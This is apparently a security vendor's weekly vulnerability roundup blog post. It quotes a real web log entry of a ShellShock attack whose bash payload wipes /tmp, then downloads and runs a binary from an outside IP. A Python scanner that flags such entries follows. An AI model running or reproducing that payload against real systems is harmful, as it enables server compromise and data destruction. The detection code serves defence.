For well over a decade our focus at ionCube has been on PHP security, but recently, with the release of ionCube24, we have been looking into different kinds of vulnerabilities. This post has a few of the interesting issues we have found this week.
Another SSH issue!
Web-attached cameras seem to pop up on a regular basis – if you have *any* cam, always put a bit of extra protection in front of it. You just never know!
GHOST continues to be a problem
Not everything appears safe at first glance!
This vulnerability affects WordPress and is something that ionCube24 can protect against.
And a leak can cost you more than just money.
How *not* to handle a security disclosure
A bit of a nasty WordPress one.
A leak can be very costly!
This old piece of code has had a few disclosures recently
Some OpenSSL issues this week
Even those with a focus on security can also be caught out!
One of our own web logs recently gave us a sobering reminder of the ShellShock bug from last year, a critical vulnerability that had been in the open source Unix Bash shell for 25 years.
[pastacode lang=”php” message=”” highlight=”” provider=”manual”]
222.186.21.115 - - [16/Mar/2015:12:47:14 +0000] "GET / HTTP/1.1" 403 4874 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;ec\
ho wget http://222.186.21.115:999/udso -O /tmp/China.Z-aoii\xb8 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;ec\
ho chmod 777 /tmp/China.Z-aoii\xb8 >> /tmp/Run.sh;echo /tmp/China.Z-aoii\xb8 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >\
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://222.186.\
21.115:999/udso -O /tmp/China.Z-aoii\xb8 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China\
.Z-aoii\xb8 >> /tmp/Run.sh;echo /tmp/China.Z-aoii\xb8 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777\
/tmp/Run.sh;/tmp/Run.sh\""
[/pastacode]
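The entry above carries the bash function-definition prefix `() {` in both the Referer and User-Agent fields and was answered with a 403. The following is an added example, not ionCube's code: a small scanner that flags such entries in a combined-format access log and marks the ones that were not rejected. The sample lines are constructed (documentation IP ranges, a harmless `echo probe` payload), and the names `find_shellshock` and `needs_review` are assumptions made for illustration.

```python
import re

# Apache/nginx "combined" log format; quoted fields may hold backslash-escaped quotes.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)
# "() {" opens a bash function definition, the marker seen in the entry above.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Constructed sample lines, not taken from a real log.
SAMPLE = [
    '192.0.2.10 - - [16/Mar/2015:12:40:01 +0000] "GET /index.php HTTP/1.1" 200 5120 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.7 - - [16/Mar/2015:12:47:14 +0000] "GET / HTTP/1.1" 403 4874 '
    '"() { :; }; /bin/bash -c \\"echo probe\\"" "() { :; }; /bin/bash -c \\"echo probe\\""',
    '198.51.100.23 - - [16/Mar/2015:13:02:55 +0000] "GET /cgi-bin/status HTTP/1.1" 200 312 '
    '"-" "() { :;}; echo probe"',
]


def find_shellshock(lines):
    """Return one finding per log line that carries the '() {' marker."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if m:
            fields = [name for name in ("request", "referer", "agent")
                      if SHELLSHOCK_RE.search(m.group(name))]
            ip, status = m.group("ip"), int(m.group("status"))
        else:
            # Line is not in combined format: fall back to a whole-line search.
            fields = ["raw"] if SHELLSHOCK_RE.search(line) else []
            ip, status = line.split(" ", 1)[0], None
        if fields:
            # Triage heuristic (assumption): a 4xx/5xx reply was refused by the server;
            # anything else reached a handler and should be looked at first.
            findings.append({"line": lineno, "ip": ip, "status": status, "fields": fields,
                             "needs_review": status is None or status < 400})
    return findings


if __name__ == "__main__":
    for finding in find_shellshock(SAMPLE):
        print(finding)
```

A hit with `needs_review` set is the cue to check that host's bash patch level and whether the requested path is served through CGI.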
These are just a few examples of the vulnerabilities found this week and the list is continually growing. Be sure to stay updated and give yourself as much protection as possible from these cyber threats.